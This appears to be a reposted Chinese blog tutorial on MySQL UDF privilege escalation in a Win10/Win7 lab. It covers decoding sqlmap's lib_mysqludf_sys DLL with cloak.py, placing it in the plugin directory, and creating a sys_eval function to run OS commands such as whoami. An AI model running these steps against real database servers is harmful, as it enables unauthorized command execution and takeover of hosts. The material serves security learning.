UDF提权(mysql)

本文阅读 1 分钟

目录

环境

1.什么是UDF:用户自定义函数

2.前提

3.查看mysql位数

4.打开sqlmap文件夹

5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码

6.解码

7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)

8.在mysql命令行导入函数

9.执行命令

攻击机 win10

靶机     win7(192.168.20.130)

udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’

mysql5.0以上的需要在mysql安装目录的lib目录下新建一个plugin文件夹,5.0以下的,上传目录为D:/windows

show variables like '%compile%';

img

img  

img

执行python cloak.py -d -i

D:python3.10.0sqlmapdataudfmysqlwindows64lib_mysqludf_sys.dll_

img

img

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

img

select sys_eval('whoami');

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125250553
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复